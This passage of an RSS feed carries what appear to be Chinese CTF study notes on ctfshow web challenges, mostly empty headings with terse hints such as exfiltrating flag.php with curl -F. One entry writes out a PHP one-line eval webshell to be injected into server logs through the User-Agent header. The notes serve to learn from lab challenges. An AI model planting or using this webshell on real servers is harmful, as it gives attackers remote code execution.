viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web130</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80dc91e1fb0389ddbf9d" data-id="197233a6c40b80dc91e1fb0389ddbf9d"><span><div id="197233a6c40b80dc91e1fb0389ddbf9d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80dc91e1fb0389ddbf9d" title="web131"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web131</span></span></h2><div class="notion-text notion-block-198233a6c40b8061ab64cba5812210f1">利用溢出绕过preg_match</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-198233a6c40b80699e1ddcd0bda70aea" data-id="198233a6c40b80699e1ddcd0bda70aea"><span><div id="198233a6c40b80699e1ddcd0bda70aea" class="notion-header-anchor"></div><a class="notion-hash-link" href="#198233a6c40b80699e1ddcd0bda70aea" title="web132"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web132</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80fe8273cd6b60a66b00" data-id="197233a6c40b80fe8273cd6b60a66b00"><span><div id="197233a6c40b80fe8273cd6b60a66b00" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80fe8273cd6b60a66b00" title="web133"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web133</span></span></h2><div class="notion-text notion-block-198233a6c40b80cd923defbef9a23f9a">利用curl -F带出flag.php</div><div class="notion-text notion-block-198233a6c40b80ecae35ea818060ef36">相关知识：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/qq_43625917/article/details/107873787">https://blog.csdn.net/qq_43625917/article/details/107873787</a></div><div class="notion-text notion-block-198233a6c40b806eb2a6c39b2e662066"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.cnblogs.com/Hi-blog/p/Burp-Collaborator-Usage.html">https://www.cnblogs.com/Hi-blog/p/Burp-Collaborator-Usage.html</a></div><div class="notion-text notion-block-198233a6c40b808d8052f462b1fe70b5"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.ruanyifeng.com/blog/2019/09/curl-reference.html">https://www.ruanyifeng.com/blog/2019/09/curl-reference.html</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b8059b2e4c7599b4e7d3f" data-id="197233a6c40b8059b2e4c7599b4e7d3f"><span><div id="197233a6c40b8059b2e4c7599b4e7d3f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b8059b2e4c7599b4e7d3f" title="web134"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web134</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80b59512c09f6dc3b65b" data-id="197233a6c40b80b59512c09f6dc3b65b"><span><div id="197233a6c40b80b59512c09f6dc3b65b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80b59512c09f6dc3b65b" title="web135"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web135</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b8006a20dff172e4c5270" data-id="197233a6c40b8006a20dff172e4c5270"><span><div id="197233a6c40b8006a20dff172e4c5270" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b8006a20dff172e4c5270" title="web136"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web136</span></span></h2><div class="notion-text notion-block-19a233a6c40b803e8bbfcee32f08143f">利用tee命令</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80b295dff0a2fa3c54b6" data-id="197233a6c40b80b295dff0a2fa3c54b6"><span><div id="197233a6c40b80b295dff0a2fa3c54b6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80b295dff0a2fa3c54b6" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><div class="notion-text notion-block-19a233a6c40b806e8f3dd83900f5cb20">直接调用类，然后查看源码</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-196233a6c40b808fbba4da0573f93daf" data-id="196233a6c40b808fbba4da0573f93daf"><span><div id="196233a6c40b808fbba4da0573f93daf" class="notion-header-anchor"></div><a class="notion-hash-link" href="#196233a6c40b808fbba4da0573f93daf" title="web138"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web138</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b80e2aea2e7f0f04bbbc6" data-id="19a233a6c40b80e2aea2e7f0f04bbbc6"><span><div id="19a233a6c40b80e2aea2e7f0f04bbbc6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b80e2aea2e7f0f04bbbc6" title="web139"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web139</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b80d9879ccf4df4982709" data-id="19a233a6c40b80d9879ccf4df4982709"><span><div id="19a233a6c40b80d9879ccf4df4982709" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b80d9879ccf4df4982709" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b80cb9bb1c47777679ca5" data-id="19a233a6c40b80cb9bb1c47777679ca5"><span><div id="19a233a6c40b80cb9bb1c47777679ca5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b80cb9bb1c47777679ca5" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b806791ccd6b5a042ffa4" data-id="19a233a6c40b806791ccd6b5a042ffa4"><span><div id="19a233a6c40b806791ccd6b5a042ffa4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b806791ccd6b5a042ffa4" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b800a94bad0e24c7d3287" data-id="19a233a6c40b800a94bad0e24c7d3287"><span><div id="19a233a6c40b800a94bad0e24c7d3287" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b800a94bad0e24c7d3287" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b809e87d4c989687e78bf" data-id="19a233a6c40b809e87d4c989687e78bf"><span><div id="19a233a6c40b809e87d4c989687e78bf" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b809e87d4c989687e78bf" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b8037bb8fce228362ec5e" data-id="19a233a6c40b8037bb8fce228362ec5e"><span><div id="19a233a6c40b8037bb8fce228362ec5e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b8037bb8fce228362ec5e" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b80cea1f3f59bce08581c" data-id="19a233a6c40b80cea1f3f59bce08581c"><span><div id="19a233a6c40b80cea1f3f59bce08581c" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b80cea1f3f59bce08581c" title="web137"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web137</span></span></h2><div class="notion-blank notion-block-19a233a6c40b801da293fe44a7903a15"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-19a233a6c40b801188d2d8fa78f8d478" data-id="19a233a6c40b801188d2d8fa78f8d478"><span><div id="19a233a6c40b801188d2d8fa78f8d478" class="notion-header-anchor"></div><a class="notion-hash-link" href="#19a233a6c40b801188d2d8fa78f8d478" title="free time"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">free time</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-193233a6c40b8008a38fdbddd0e2b9ff" data-id="193233a6c40b8008a38fdbddd0e2b9ff"><span><div id="193233a6c40b8008a38fdbddd0e2b9ff" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b8008a38fdbddd0e2b9ff" title="ctfshow misc "><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">ctfshow misc </span></span></h3><div class="notion-text notion-block-1a8233a6c40b80148ce5fddd9e4c7918">misc30</div><div class="notion-text notion-block-193233a6c40b80cdb0fee2815411d30f">解压要密码，放010看看，发现是伪加密，修改解压后得到MP3文件，foremost分离出一张jpg图片，发现高度似乎不对，宽高处理后发现猪圈密码，解密得到flag</div><div class="notion-blank notion-block-193233a6c40b8045b77eeec0c5c02948"> </div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[学习日记-3(文件包含篇)]]></title>
            <link>https://510517.xyz/article/2.4</link>
            <guid>https://510517.xyz/article/2.4</guid>
            <pubDate>Wed, 15 Jan 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-17c233a6c40b80b4b404da54c90371fe"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-190233a6c40b8003ada4ed0816bf9460" data-id="190233a6c40b8003ada4ed0816bf9460"><span><div id="190233a6c40b8003ada4ed0816bf9460" class="notion-header-anchor"></div><a class="notion-hash-link" href="#190233a6c40b8003ada4ed0816bf9460" title="web78"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web78</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-190233a6c40b804bb452cb9a250bd45f" data-id="190233a6c40b804bb452cb9a250bd45f"><span><div id="190233a6c40b804bb452cb9a250bd45f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#190233a6c40b804bb452cb9a250bd45f" title="web79"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web79</span></span></h2><div class="notion-text notion-block-190233a6c40b80c7a6d4e6381a0ce0c2"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/hsd2012/article/details/51194554?spm=1001.2101.3001.6650.2&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-2-51194554-blog-100028185.pc_relevant_vip_default&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-2-51194554-blog-100028185.pc_relevant_vip_default&amp;utm_relevant_index=3">php中代码开始标志类型(,,,&lt;% %&gt;,&lt;%= %&gt;)</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-190233a6c40b80afa43efaf38556deb9" data-id="190233a6c40b80afa43efaf38556deb9"><span><div id="190233a6c40b80afa43efaf38556deb9" class="notion-header-anchor"></div><a class="notion-hash-link" href="#190233a6c40b80afa43efaf38556deb9" title="web80+81"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web80+81</span></span></h2><div class="notion-text notion-block-190233a6c40b80b3a1e5f9b924467097">利用日志文件，先通过user-agent写入一句话木马&lt;?php @eval($_POST[1]);?&gt;</div><div class="notion-blank notion-block-190233a6c40b8070beebe5ac49a2674e"> </div></main></div>]]></content:encoded>
        </item>
    </channel>
</rss>